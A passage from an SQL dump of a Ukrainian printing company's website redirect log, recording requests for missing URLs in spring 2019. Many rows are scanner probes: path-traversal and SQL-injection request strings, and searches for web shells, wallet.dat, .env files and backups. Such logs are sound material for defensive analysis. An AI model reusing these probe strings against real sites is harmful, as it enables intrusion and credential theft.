16:35:19','0000-00-00 00:00:00',301),(14496,'https://ekvatorprint.com.ua/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php','',2,0,'2019-03-16 17:49:20','0000-00-00 00:00:00',301),(14497,'https://ekvatorprint.com.ua/wordpress/wp-admin/install.php',NULL,'','',16,0,'2019-03-18 12:04:40','0000-00-00 00:00:00',301),(14498,'https://ekvatorprint.com.ua/https:/ekvatorprint.com.ua/',NULL,'','',8,0,'2019-03-18 13:41:29','0000-00-00 00:00:00',301),(14499,'https://ekvatorprint.com.ua/5-2010-12-01-14-37-59',NULL,'','',59,0,'2019-03-18 16:32:16','0000-00-00 00:00:00',301),(14500,'http://ekvatorprint.com.ua/wp-content/themes/konzept/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/konzept/style.css','',2,0,'2019-03-18 16:55:21','0000-00-00 00:00:00',301),(14501,'https://ekvatorprint.com.ua/wp-content/themes/thisway/includes/uploadify/upload_settings_image.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php','',1,0,'2019-03-19 08:33:09','0000-00-00 00:00:00',301),(14502,'https://ekvatorprint.com.ua/???',NULL,'','',16,0,'2019-03-19 09:59:00','0000-00-00 00:00:00',301),(14503,'http://ekvatorprint.com.ua/images/stories/kreativnaja-reklama/pechat-na-bannere-volkswage.jpg',NULL,'https://ekvatorprint.com.ua/banner-printing','',24,0,'2019-03-20 16:07:51','0000-00-00 00:00:00',301),(14504,'http://ekvatorprint.com.ua/images/stories/kreativnaja-reklama/pechat-na-bannere-volkswage.jpg',NULL,'https://ekvatorprint.com.ua/banner-printing','',1,0,'2019-03-20 16:07:51','0000-00-00 00:00:00',301),(14505,'https://ekvatorprint.com.ua/wp-admin/install.php',NULL,'','',21,0,'2019-03-20 16:09:23','0000-00-00 00:00:00',301),(14506,'https://ekvatorprint.com.ua/kak-podtverdit-oplatu-za-zakaz  )',NULL,'android-app://com.google.android.googlequicksearchbox','',1,0,'2019-03-20 18:08:45','0000-00-00 00:00:00',301),(14507,'https://ekvatorprint.com.ua/index.php?option=com_fireboard',NULL,'','',7,0,'2019-03-20 20:07:44','0000-00-00 00:00:00',301),(14508,'https://ekvatorprint.com.ua/index.php?option=com_easyblog',NULL,'','',7,0,'2019-03-21 05:38:17','0000-00-00 00:00:00',301),(14509,'http://ekvatorprint.com.ua/trebovaniya/templates/gk_ilife/favicon.ico',NULL,'','',11,0,'2019-03-21 07:05:32','0000-00-00 00:00:00',301),(14510,'http://ekvatorprint.com.ua/media/plg_content_mavikthumbnails/js/hover.js',NULL,'https://ekvatorprint.com.ua/printing-on-canvas','',2,0,'2019-03-21 15:59:01','0000-00-00 00:00:00',301),(14511,'https://ekvatorprint.com.ua/index.php?option=com_easydiscuss',NULL,'','',1,0,'2019-03-21 17:19:53','0000-00-00 00:00:00',301),(14512,'http://ekvatorprint.com.ua/modulnye-kartiny/templates/gk_ilife/favicon.ico',NULL,'','',9,0,'2019-03-21 17:24:34','0000-00-00 00:00:00',301),(14513,'https://ekvatorprint.com.ua/component/content/article?id=article',NULL,'','',4,0,'2019-03-22 18:05:20','0000-00-00 00:00:00',301),(14514,'https://ekvatorprint.com.ua/rq1cwj8haq0htqabt99x',NULL,'','',1,0,'2019-03-22 18:29:08','0000-00-00 00:00:00',301),(14515,'https://ekvatorprint.com.ua/wp-content/themes/dance-studio/core/libs/',NULL,'http://ekvatorprint.com.ua/wp-content/themes/dance-studio/core/libs/','',1,0,'2019-03-23 04:45:03','0000-00-00 00:00:00',301),(14516,'https://ekvatorprint.com.ua/index.php?itemid=17&id=16&option=com_content&view=article',NULL,'http://ekvatorprint.com.ua/index.php?Itemid=17&id=16&option=com_content&view=article','',1,0,'2019-03-23 06:29:52','0000-00-00 00:00:00',301),(14517,'https://ekvatorprint.com.ua/wp-content/themes/rightnow/includes/uploadify/upload_settings_image.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','',2,0,'2019-03-25 15:48:55','0000-00-00 00:00:00',301),(14518,'https://ekvatorprint.com.ua/admin/login.php',NULL,'','',10,0,'2019-03-25 23:37:18','0000-00-00 00:00:00',301),(14519,'https://ekvatorprint.com.ua/administrator/components/com_alberghi/upload.alberghi.php',NULL,'','',14,0,'2019-03-25 23:38:06','0000-00-00 00:00:00',301),(14520,'https://ekvatorprint.com.ua/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',33,0,'2019-03-25 23:38:45','0000-00-00 00:00:00',301),(14521,'https://ekvatorprint.com.ua/plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',34,0,'2019-03-25 23:40:26','0000-00-00 00:00:00',301),(14522,'https://ekvatorprint.com.ua/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',22,0,'2019-03-25 23:40:37','0000-00-00 00:00:00',301),(14523,'https://ekvatorprint.com.ua/components/com_sexycontactform/fileupload/',NULL,'','',29,0,'2019-03-25 23:40:45','0000-00-00 00:00:00',301),(14524,'https://ekvatorprint.com.ua/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',16,0,'2019-03-25 23:40:49','0000-00-00 00:00:00',301),(14525,'https://ekvatorprint.com.ua/administrator/components/com_extplorer/uploadhandler.php',NULL,'','',15,0,'2019-03-25 23:41:06','0000-00-00 00:00:00',301),(14526,'https://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',26,0,'2019-03-25 23:41:32','0000-00-00 00:00:00',301),(14527,'https://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/php/upload.php?type=media',NULL,'','',20,0,'2019-03-25 23:41:42','0000-00-00 00:00:00',301),(14528,'https://ekvatorprint.com.ua/elfinder/php/connector.minimal.php',NULL,'','',3,0,'2019-03-25 23:47:33','0000-00-00 00:00:00',301),(14529,'https://ekvatorprint.com.ua/wp/wp-admin/install.php',NULL,'','',10,0,'2019-03-27 21:07:36','0000-00-00 00:00:00',301),(14530,'http://ekvatorprint.com.ua/wp-content/themes/purevision/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/purevision/style.css','',3,0,'2019-03-28 06:27:55','0000-00-00 00:00:00',301),(14531,'https://ekvatorprint.com.ua/hook-filters.php',NULL,'','',7,0,'2019-03-28 16:16:24','0000-00-00 00:00:00',301),(14532,'https://ekvatorprint.com.ua/components/com_foxcontact/foxcontact.php',NULL,'','',25,0,'2019-03-29 00:41:57','0000-00-00 00:00:00',301),(14533,'https://ekvatorprint.com.ua/temp/bitcoin/wallet.dat',NULL,'','',9,0,'2019-03-29 20:46:59','0000-00-00 00:00:00',301),(14534,'https://ekvatorprint.com.ua/temp/wallet.dat',NULL,'','',9,0,'2019-03-29 20:47:04','0000-00-00 00:00:00',301),(14535,'https://ekvatorprint.com.ua/backup/bitcoin/',NULL,'','',9,0,'2019-03-29 20:47:10','0000-00-00 00:00:00',301),(14536,'https://ekvatorprint.com.ua/bitcoin/',NULL,'','',9,0,'2019-03-29 20:47:13','0000-00-00 00:00:00',301),(14537,'https://ekvatorprint.com.ua/bitcoin/backup/wallet.dat',NULL,'','',33,0,'2019-03-29 20:47:40','0000-00-00 00:00:00',301),(14538,'https://ekvatorprint.com.ua/wallet.dat',NULL,'','',38,0,'2019-03-29 20:48:09','0000-00-00 00:00:00',301),(14539,'https://ekvatorprint.com.ua/wallet/',NULL,'','',8,0,'2019-03-29 20:48:23','0000-00-00 00:00:00',301),(14540,'https://ekvatorprint.com.ua/wallet/wallet.dat',NULL,'','',35,0,'2019-03-29 20:48:37','0000-00-00 00:00:00',301),(14541,'https://ekvatorprint.com.ua/bitcoin/wallet.dat',NULL,'','',61,0,'2019-03-29 20:48:51','0000-00-00 00:00:00',301),(14542,'https://ekvatorprint.com.ua/backup/wallet.dat',NULL,'','',36,0,'2019-03-29 20:50:45','0000-00-00 00:00:00',301),(14543,'https://ekvatorprint.com.ua/.bitcoin/wallet.dat',NULL,'','',11,0,'2019-03-29 20:51:36','0000-00-00 00:00:00',301),(14544,'https://ekvatorprint.com.ua/backup/bitcoin/wallet.dat',NULL,'','',34,0,'2019-03-29 20:58:44','0000-00-00 00:00:00',301),(14545,'https://ekvatorprint.com.ua/assets/images/accesson.php',NULL,'','',14,0,'2019-03-29 21:53:57','0000-00-00 00:00:00',301),(14546,'http://ekvatorprint.com.ua/wp-content/themes/nuance/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/nuance/style.css','',2,0,'2019-03-29 22:01:31','0000-00-00 00:00:00',301),(14547,'https://ekvatorprint.com.ua/index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',10,0,'2019-03-30 07:40:15','0000-00-00 00:00:00',301),(14548,'https://ekvatorprint.com.ua/0xn3m9urvowwu',NULL,'','',1,0,'2019-03-30 21:02:38','0000-00-00 00:00:00',301),(14549,'https://ekvatorprint.com.ua/customizer.php',NULL,'','',8,0,'2019-03-31 11:44:29','0000-00-00 00:00:00',301),(14550,'https://ekvatorprint.com.ua/modules/mod_joomlaapi/apisystem.php',NULL,'','',1,0,'2019-03-31 12:57:39','0000-00-00 00:00:00',301),(14551,'https://ekvatorprint.com.ua/modules/mod_googlemapsapi/fm.php',NULL,'','',1,0,'2019-03-31 12:57:39','0000-00-00 00:00:00',301),(14552,'https://ekvatorprint.com.ua/administrator/dbapi.php',NULL,'','',1,0,'2019-03-31 12:57:39','0000-00-00 00:00:00',301),(14553,'https://ekvatorprint.com.ua/modules/mod_mapsgoogle/fm.php',NULL,'','',1,0,'2019-03-31 12:57:40','0000-00-00 00:00:00',301),(14554,'https://ekvatorprint.com.ua/libraries/joomla/application/component/view-base64.php',NULL,'','',1,0,'2019-03-31 12:57:40','0000-00-00 00:00:00',301),(14555,'https://ekvatorprint.com.ua/rroudsmqbxkdidvxjm',NULL,'','',1,0,'2019-03-31 18:04:44','0000-00-00 00:00:00',301),(14556,'https://ekvatorprint.com.ua/0vaem1cskhzkpshyw',NULL,'','',1,0,'2019-04-01 07:27:23','0000-00-00 00:00:00',301),(14557,'https://ekvatorprint.com.ua/.env',NULL,'','',521,0,'2019-04-01 10:07:19','0000-00-00 00:00:00',301),(14558,'http://ekvatorprint.com.ua/https:/ekvatorprint.com.ua/images/thumbnails/images/portfolio/plotternaya-podrezka/плоттерная подрезка в экваторпринт-fill-530x530.png',NULL,'','',1,0,'2019-04-01 13:14:14','0000-00-00 00:00:00',301),(14559,'https://ekvatorprint.com.ua/back.zip',NULL,'http://ekvatorprint.com.ua/back.zip','',1,0,'2019-04-01 15:47:30','0000-00-00 00:00:00',301),(14560,'https://ekvatorprint.com.ua/webconfig.txt.php',NULL,'http://www.google.com.hk','',16,0,'2019-04-01 16:00:44','0000-00-00 00:00:00',301),(14561,'https://ekvatorprint.com.ua/user/register/?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax',NULL,'http://www.google.com.hk','',4,0,'2019-04-01 16:01:40','0000-00-00 00:00:00',301),(14562,'https://ekvatorprint.com.ua/administrator/webconfig.txt.php',NULL,'http://www.google.com.hk','',4,0,'2019-04-01 16:04:20','0000-00-00 00:00:00',301),(14563,'https://ekvatorprint.com.ua/wp-content/plugins/log.php',NULL,'','',1,0,'2019-04-03 01:20:16','0000-00-00 00:00:00',301),(14564,'https://ekvatorprint.com.ua/backup.zip',NULL,'https://ekvatorprint.com.ua/backup.zip','',12,0,'2019-04-03 05:26:26','0000-00-00 00:00:00',301),(14565,'https://ekvatorprint.com.ua/backup.sql',NULL,'https://ekvatorprint.com.ua/backup.sql','',10,0,'2019-04-03 05:26:27','0000-00-00 00:00:00',301),(14566,'https://ekvatorprint.com.ua/backup.tar.gz',NULL,'https://ekvatorprint.com.ua/backup.tar.gz','',6,0,'2019-04-03 05:26:27','0000-00-00 00:00:00',301),(14567,'https://ekvatorprint.com.ua/backup.tar',NULL,'https://ekvatorprint.com.ua/backup.tar','',8,0,'2019-04-03 05:26:28','0000-00-00 00:00:00',301),(14568,'https://ekvatorprint.com.ua/magmi/web/magmi.php',NULL,'','',1,0,'2019-04-03 13:50:02','0000-00-00 00:00:00',301),(14569,'https://ekvatorprint.com.ua/js/webforms/upload/index.php',NULL,'','',1,0,'2019-04-03 17:07:35','0000-00-00 00:00:00',301),(14570,'https://ekvatorprint.com.ua/blog/wp-admin/install.php',NULL,'','',7,0,'2019-04-03 19:43:29','0000-00-00 00:00:00',301),(14571,'https://ekvatorprint.com.ua/admin.tar.gz',NULL,'https://ekvatorprint.com.ua/admin.tar.gz','',4,0,'2019-04-04 00:48:33','0000-00-00 00:00:00',301),(14572,'https://ekvatorprint.com.ua/admin.zip',NULL,'https://ekvatorprint.com.ua/admin.zip','',4,0,'2019-04-04 00:48:33','0000-00-00 00:00:00',301),(14573,'https://ekvatorprint.com.ua/admin.tar',NULL,'https://ekvatorprint.com.ua/admin.tar','',4,0,'2019-04-04 00:48:34','0000-00-00 00:00:00',301),(14574,'https://ekvatorprint.com.ua/admin.sql',NULL,'https://ekvatorprint.com.ua/admin.sql','',2,0,'2019-04-04 00:48:43','0000-00-00 00:00:00',301),(14575,'https://ekvatorprint.com.ua/temp.php',NULL,'','',7,0,'2019-04-04 03:15:37','0000-00-00 00:00:00',301),(14576,'https://ekvatorprint.com.ua/sql.sql',NULL,'https://ekvatorprint.com.ua/sql.sql','',3,0,'2019-04-04 20:08:33','0000-00-00 00:00:00',301),(14577,'https://ekvatorprint.com.ua/sql.tar',NULL,'https://ekvatorprint.com.ua/sql.tar','',2,0,'2019-04-04 20:08:40','0000-00-00 00:00:00',301),(14578,'https://ekvatorprint.com.ua/sql.tar.gz',NULL,'https://ekvatorprint.com.ua/sql.tar.gz','',1,0,'2019-04-04 20:08:40','0000-00-00 00:00:00',301),(14579,'https://ekvatorprint.com.ua/sql.zip',NULL,'https://ekvatorprint.com.ua/sql.zip','',2,0,'2019-04-04 20:08:41','0000-00-00 00:00:00',301),(14580,'https://ekvatorprint.com.ua/log.php',NULL,'','',15,0,'2019-04-05 06:03:45','0000-00-00 00:00:00',301),(14581,'https://ekvatorprint.com.ua/?option=com_avreloaded&view=popup&itemid=71&divid=mypopup\'/*!12345union*//*!12345select*/0x232366696e642323-- \'',NULL,'','',1,0,'2019-04-05 06:31:20','0000-00-00 00:00:00',301),(14582,'https://ekvatorprint.com.ua/upload.zip',NULL,'https://ekvatorprint.com.ua/upload.zip','',3,0,'2019-04-05 15:32:12','0000-00-00 00:00:00',301),(14583,'https://ekvatorprint.com.ua/upload.tar',NULL,'https://ekvatorprint.com.ua/upload.tar','',1,0,'2019-04-05 15:32:16','0000-00-00 00:00:00',301),(14584,'https://ekvatorprint.com.ua/upload.sql',NULL,'https://ekvatorprint.com.ua/upload.sql','',2,0,'2019-04-05 15:32:16','0000-00-00 00:00:00',301),(14585,'https://ekvatorprint.com.ua/upload.tar.gz',NULL,'https://ekvatorprint.com.ua/upload.tar.gz','',1,0,'2019-04-05 15:32:17','0000-00-00 00:00:00',301),(14586,'https://ekvatorprint.com.ua/wp-icoud.php',NULL,'','',7,0,'2019-04-06 10:05:50','0000-00-00 00:00:00',301),(14587,'https://ekvatorprint.com.ua/wp-conde.php',NULL,'','',7,0,'2019-04-07 13:58:10','0000-00-00 00:00:00',301),(14588,'https://ekvatorprint.com.ua/wp-content/plugins/complete-gallery-manager/frames/upload-images.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','',3,0,'2019-04-07 16:54:51','0000-00-00 00:00:00',301),(14589,'https://ekvatorprint.com.ua/new/wp-admin/install.php',NULL,'','',7,0,'2019-04-07 23:08:56','0000-00-00 00:00:00',301),(14590,'https://ekvatorprint.com.ua/vulrloxq3ccnul',NULL,'','',1,0,'2019-04-08 16:08:31','0000-00-00 00:00:00',301),(14591,'https://ekvatorprint.com.ua/wp-ajax-hook.php',NULL,'','',4,0,'2019-04-08 17:00:36','0000-00-00 00:00:00',301),(14592,'https://ekvatorprint.com.ua/wp-content/plugins/temp.php',NULL,'','',1,0,'2019-04-09 20:25:59','0000-00-00 00:00:00',301),(14593,'https://ekvatorprint.com.ua/templates/beez/index.php',NULL,'','',42,0,'2019-04-09 20:34:40','0000-00-00 00:00:00',301),(14594,'https://ekvatorprint.com.ua/index.php?option=com_community&view=frontpage',NULL,'','',1,0,'2019-04-09 21:14:45','0000-00-00 00:00:00',301),(14595,'https://ekvatorprint.com.ua/index.php?option=com_foxcontact',NULL,'','',2,0,'2019-04-10 09:18:32','0000-00-00 00:00:00',301),(14596,'https://ekvatorprint.com.ua/components/com_foxcontact/lib/file-uploader.php?cid=1&mid=1&qqfile=/../../git.php',NULL,'','',1,0,'2019-04-10 09:18:34','0000-00-00 00:00:00',301),(14597,'http://ekvatorprint.com.ua/chrome-extension:/eofcbnmajmjmplflapaojjnihcjkigck/common/ui/fonts/fonts.css',NULL,'','',1,0,'2019-04-10 11:06:01','0000-00-00 00:00:00',301),(14598,'https://ekvatorprint.com.ua/server/php/',NULL,'http://ekvatorprint.com.ua/server/php/','',6,0,'2019-04-10 18:17:24','0000-00-00 00:00:00',301),(14599,'https://ekvatorprint.com.ua/bps.php',NULL,'','',3,0,'2019-04-10 23:14:01','0000-00-00 00:00:00',301),(14600,'https://ekvatorprint.com.ua/mailto:e@ekvatorprint.com.ua',NULL,'','',52,0,'2019-04-11 10:30:01','0000-00-00 00:00:00',301),(14601,'https://ekvatorprint.com.ua/seo_script.php',NULL,'','',7,0,'2019-04-12 03:23:34','0000-00-00 00:00:00',301),(14602,'https://ekvatorprint.com.ua/plugins/content/apismtp/apismtp.php?test=hello',NULL,'','',30,0,'2019-04-12 06:29:28','0000-00-00 00:00:00',301),(14603,'https://ekvatorprint.com.ua/delivery\",\"https:/ekvatorprint.com.ua/delivery\",\"https:/ekvatorprint.com.ua/delivery\",\"\",\"\"]]],null,null,null,null]?gclid=eaiaiqobchmi-7685mnl4qivvtvgch1nlq2keaeyasaaegk2-vd_bwe',NULL,'','',1,0,'2019-04-12 22:13:26','0000-00-00 00:00:00',301),(14604,'https://ekvatorprint.com.ua/delivery\",\"_top\",[[[[10,10,10,10]]],[[1000]],null],\"https:/googleads.g.doubleclick.net/pagead/conversion/?ai=cl8jghq2xxlvoedx2gafnqrbqcn-uyynw5jig_cyj97x8n9wceaeg0f-5eaabuvrpvgpiaqmpavozybg4hmq-qambyapdbkoevqfp0bxr4vlululhjtwbsmbvvk7bo9n8ivdbmqkffnveywt6_tp56udo4dxtx_f9qrssrilrqks--va_ankoqqs56id1f1niegqawqjym_7e5bbdsmmhe2ry6vbubzi6zhqqzhtbes3kdrmzkzjqxf7roaj48-cr-6uvutme29hphmzc5c-vonmy0-wus6prdybw1x6bahs7phlnze2rvlp0nsgy2dqlg1-4ds2kman-z_allszu85gqkgutci_abjka043vaygfhd_qxgagbi7ybgsab66fsegob47og6gh1ckbqafg0xuob7ogqafzyxuob8_mg6ghpr4b2acasagc0gghcibheaeyarejfthct6ppdzqacghyewocfbead3d3dy5hym91dhj1lmnvbq',NULL,'','',1,0,'2019-04-12 22:13:27','0000-00-00 00:00:00',301),(14605,'https://ekvatorprint.com.ua/delivery\",\"https:/ekvatorprint.com.ua/delivery\",\"https:/ekvatorprint.com.ua/delivery\",\"\",\"\"]]],null,null,null,null]',NULL,'','',1,0,'2019-04-12 22:13:28','0000-00-00 00:00:00',301),(14606,'https://ekvatorprint.com.ua/components/com_jdownloads/jdownloads.php',NULL,'','',1,0,'2019-04-12 23:49:00','0000-00-00 00:00:00',301),(14607,'https://ekvatorprint.com.ua/components/com_jbcatalog/jbcatalog.php',NULL,'','',1,0,'2019-04-12 23:49:00','0000-00-00 00:00:00',301),(14608,'https://ekvatorprint.com.ua/components/com_b2jcontact/b2jcontact.php',NULL,'','',2,0,'2019-04-12 23:49:01','0000-00-00 00:00:00',301),(14609,'https://ekvatorprint.com.ua/components/com_fabrik/fabrik.php',NULL,'','',1,0,'2019-04-12 23:49:01','0000-00-00 00:00:00',301),(14610,'https://ekvatorprint.com.ua/components/com_adsmanager/adsmanager.php',NULL,'','',1,0,'2019-04-12 23:49:01','0000-00-00 00:00:00',301),(14611,'https://ekvatorprint.com.ua/components/com_myblog/myblog.php',NULL,'','',1,0,'2019-04-12 23:49:01','0000-00-00 00:00:00',301),(14612,'https://ekvatorprint.com.ua/administrator/components/com_xcloner-backupandrestore/index2.php',NULL,'','',5,0,'2019-04-12 23:49:02','0000-00-00 00:00:00',301),(14613,'https://ekvatorprint.com.ua/wp-includes/images/hon2our.php',NULL,'','',1,0,'2019-04-13 06:58:13','0000-00-00 00:00:00',301),(14614,'http://ekvatorprint.com.ua/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.js',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.js','',1,0,'2019-04-13 08:01:35','0000-00-00 00:00:00',301),(14615,'https://ekvatorprint.com.ua/assets/images/seo_script.php',NULL,'','',1,0,'2019-04-14 10:05:20','0000-00-00 00:00:00',301),(14616,'https://ekvatorprint.com.ua/modules/homepageadvertise2/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/homepageadvertise2/uploadimage.php','',1,0,'2019-04-15 05:01:59','0000-00-00 00:00:00',301),(14617,'https://ekvatorprint.com.ua/phpmyadmin/',NULL,'http://ekvatorprint.com.ua//phpmyadmin//','',14,0,'2019-04-15 08:29:12','0000-00-00 00:00:00',301),(14618,'https://ekvatorprint.com.ua/assets/images/search.php',NULL,'','',15,0,'2019-04-15 13:23:13','0000-00-00 00:00:00',301),(14619,'https://ekvatorprint.com.ua/wp-admin/setup-config.php?step=1',NULL,'','',3,0,'2019-04-15 14:11:08','0000-00-00 00:00:00',301),(14620,'https://ekvatorprint.com.ua/wp-admin/setup-config.php?step=2',NULL,'','',3,0,'2019-04-15 14:11:09','0000-00-00 00:00:00',301),(14621,'https://ekvatorprint.com.ua/p...]]></description><link>http:/www.nika-audita.com/news/shirokoformatnaja_pechat/2014-05-17-719</link><category>бизнес</category><dc:creator>dangerlive123</dc:creator><guid>http:/www.nika-audita.com/news/2014-05-17-719</guid><pubdate>sat, 17 may 2014 17:49:42 gmt</pubdate></item><item><title>як відкрити трена',NULL,'','',2,0,'2019-04-17 19:38:16','0000-00-00 00:00:00',301),(14622,'https://ekvatorprint.com.ua/modules/simpleslideshow/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/simpleslideshow/uploadimage.php','',1,0,'2019-04-18 03:59:32','0000-00-00 00:00:00',301),(14623,'https://ekvatorprint.com.ua/a7wnrngs7ljfjuono',NULL,'','',1,0,'2019-04-18 10:02:13','0000-00-00 00:00:00',301),(14624,'https://ekvatorprint.com.ua/?option=com_content&view=article&id=5&itemid=6',NULL,'','',9,0,'2019-04-19 09:52:02','0000-00-00 00:00:00',301),(14625,'https://ekvatorprint.com.ua/undefined?0.5423150375776349',NULL,'','',1,0,'2019-04-19 14:05:37','0000-00-00 00:00:00',301),(14626,'https://ekvatorprint.com.ua/undefined?0.26161202366057656',NULL,'','',1,0,'2019-04-19 14:05:37','0000-00-00 00:00:00',301),(14627,'https://ekvatorprint.com.ua/modules/columnadverts/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/columnadverts/uploadimage.php','',1,0,'2019-04-20 02:27:20','0000-00-00 00:00:00',301),(14628,'https://ekvatorprint.com.ua/wso.php',NULL,'','',84,0,'2019-04-21 08:58:50','0000-00-00 00:00:00',301),(14629,'https://ekvatorprint.com.ua/modules/modules/modules.php',NULL,'','',23,0,'2019-04-21 08:58:54','0000-00-00 00:00:00',301),(14630,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/clean.php',NULL,'','',23,0,'2019-04-21 08:58:57','0000-00-00 00:00:00',301),(14631,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',69,0,'2019-04-21 08:59:01','0000-00-00 00:00:00',301),(14632,'https://ekvatorprint.com.ua/libraries/joomla/css.php',NULL,'','',23,0,'2019-04-21 08:59:04','0000-00-00 00:00:00',301),(14633,'https://ekvatorprint.com.ua/libraries/joomla/jmails.php?u',NULL,'','',23,0,'2019-04-21 08:59:07','0000-00-00 00:00:00',301),(14634,'https://ekvatorprint.com.ua/libraries/joomla/jmail.php?u',NULL,'','',23,0,'2019-04-21 08:59:11','0000-00-00 00:00:00',301),(14635,'https://ekvatorprint.com.ua/images/vuln.php',NULL,'','',42,0,'2019-04-21 08:59:15','0000-00-00 00:00:00',301),(14636,'https://ekvatorprint.com.ua/tmp/vuln.php',NULL,'','',36,0,'2019-04-21 08:59:18','0000-00-00 00:00:00',301),(14637,'https://ekvatorprint.com.ua/xxx.php',NULL,'','',32,0,'2019-04-21 08:59:22','0000-00-00 00:00:00',301),(14638,'https://ekvatorprint.com.ua/marvins.php',NULL,'','',35,0,'2019-04-21 08:59:25','0000-00-00 00:00:00',301),(14639,'https://ekvatorprint.com.ua/rxr.php?rxr',NULL,'','',1,0,'2019-04-21 08:59:29','0000-00-00 00:00:00',301),(14640,'https://ekvatorprint.com.ua/olux.php',NULL,'','',58,0,'2019-04-21 08:59:32','0000-00-00 00:00:00',301),(14641,'https://ekvatorprint.com.ua/indoxploit.php',NULL,'','',43,0,'2019-04-21 08:59:36','0000-00-00 00:00:00',301),(14642,'https://ekvatorprint.com.ua/error.php',NULL,'','',54,0,'2019-04-21 08:59:39','0000-00-00 00:00:00',301),(14643,'https://ekvatorprint.com.ua/rxr.php',NULL,'','',45,0,'2019-04-21 08:59:42','0000-00-00 00:00:00',301),(14644,'https://ekvatorprint.com.ua/components/com_b2jcontact/izoc.php',NULL,'','',22,0,'2019-04-21 08:59:46','0000-00-00 00:00:00',301),(14645,'https://ekvatorprint.com.ua/v3.php',NULL,'','',28,0,'2019-04-21 08:59:50','0000-00-00 00:00:00',301),(14646,'https://ekvatorprint.com.ua/v5.php',NULL,'','',32,0,'2019-04-21 08:59:53','0000-00-00 00:00:00',301),(14647,'https://ekvatorprint.com.ua/up.php',NULL,'','',91,0,'2019-04-21 09:00:00','0000-00-00 00:00:00',301),(14648,'https://ekvatorprint.com.ua/upload.php',NULL,'','',83,0,'2019-04-21 09:00:06','0000-00-00 00:00:00',301),(14649,'https://ekvatorprint.com.ua/shell.php',NULL,'','',69,0,'2019-04-21 09:00:10','0000-00-00 00:00:00',301),(14650,'https://ekvatorprint.com.ua/home/5-2010-12-01-14-37-59?itemid=',NULL,'','',2,0,'2019-04-21 19:44:36','0000-00-00 00:00:00',301),(14651,'https://ekvatorprint.com.ua/user/login',NULL,'http://ekvatorprint.com.ua/user/login','',6,0,'2019-04-21 21:22:35','0000-00-00 00:00:00',301),(14652,'https://ekvatorprint.com.ua/modules/homepageadvertise/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/homepageadvertise/uploadimage.php','',1,0,'2019-04-22 05:59:04','0000-00-00 00:00:00',301),(14653,'https://ekvatorprint.com.ua/printing-on-canvas-сайт',NULL,'','',1,0,'2019-04-22 10:53:15','0000-00-00 00:00:00',301),(14654,'https://ekvatorprint.com.ua/modules/mod_araticlhess/mod_araticlhess.php',NULL,'','',1,0,'2019-04-23 00:48:07','0000-00-00 00:00:00',301),(14655,'https://ekvatorprint.com.ua/outdoor-advirtising',NULL,'','',1,0,'2019-04-23 10:52:24','0000-00-00 00:00:00',301),(14656,'https://ekvatorprint.com.ua/,178.20.153.111',NULL,'','',4,0,'2019-04-23 21:13:17','0000-00-00 00:00:00',301),(14657,'https://ekvatorprint.com.ua/modules/productpageadverts/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/productpageadverts/uploadimage.php','',1,0,'2019-04-24 02:07:49','0000-00-00 00:00:00',301),(14658,'https://ekvatorprint.com.ua/banner-printing&amp;sa=d&amp;ust=1556101038398000&sa=d&ust=1556101038407000&usg=afqjcnhxs3fqtizo7_bqsdhgtx0z7eqrfq',NULL,'http://pr.meta.ua/read/55872','',1,0,'2019-04-24 13:51:03','0000-00-00 00:00:00',301),(14659,'https://ekvatorprint.com.ua/modules/namamodule/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/namamodule/uploadimage.php','',1,0,'2019-04-25 12:17:23','0000-00-00 00:00:00',301),(14660,'https://ekvatorprint.com.ua/downloads/ini.php',NULL,'','',2,0,'2019-04-25 20:29:50','0000-00-00 00:00:00',301),(14661,'https://ekvatorprint.com.ua/statistik/start.php',NULL,'','',2,0,'2019-04-25 20:29:51','0000-00-00 00:00:00',301),(14662,'https://ekvatorprint.com.ua/components/com_content/archive/engine_functions.php',NULL,'','',2,0,'2019-04-25 20:29:51','0000-00-00 00:00:00',301),(14663,'https://ekvatorprint.com.ua/templates/etads/features/engine_functions.php',NULL,'','',2,0,'2019-04-25 20:29:52','0000-00-00 00:00:00',301),(14664,'https://ekvatorprint.com.ua/templates/etads/fonts/engine_functions.php',NULL,'','',2,0,'2019-04-25 20:29:52','0000-00-00 00:00:00',301),(14665,'https://ekvatorprint.com.ua/menu/alias.php',NULL,'','',2,0,'2019-04-25 20:29:53','0000-00-00 00:00:00',301),(14666,'https://ekvatorprint.com.ua/modules/tiger/ws0.php',NULL,'','',2,0,'2019-04-25 20:29:53','0000-00-00 00:00:00',301),(14667,'https://ekvatorprint.com.ua/css/presets/engine_functions.php',NULL,'','',2,0,'2019-04-25 20:29:53','0000-00-00 00:00:00',301),(14668,'https://ekvatorprint.com.ua/room.php',NULL,'','',2,0,'2019-04-25 